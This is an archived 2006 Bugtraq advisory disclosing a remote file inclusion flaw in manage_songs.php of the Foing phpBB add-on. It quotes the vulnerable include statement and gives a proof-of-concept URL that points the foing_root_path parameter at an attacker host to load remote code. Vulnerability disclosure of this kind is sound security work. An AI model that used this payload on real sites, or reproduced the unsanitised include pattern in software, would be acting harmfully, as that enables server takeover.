lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 12 Jun 2006 12:43:08 -0000
From: darkfire@...elive.zzn.com
To: bugtraq@...urityfocus.com
Subject: Foing (manage_songs.php) Remote File Inclusion[phpBB]


# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: darkfire@...elive.zzn.com & msn: darkfire@...kfire-br.com
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous 

---------------------------------------------------------------------

Vulnerable code :

include($foing_root_path . 'includes/common.php');

---------------------------------------------------------------------

http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ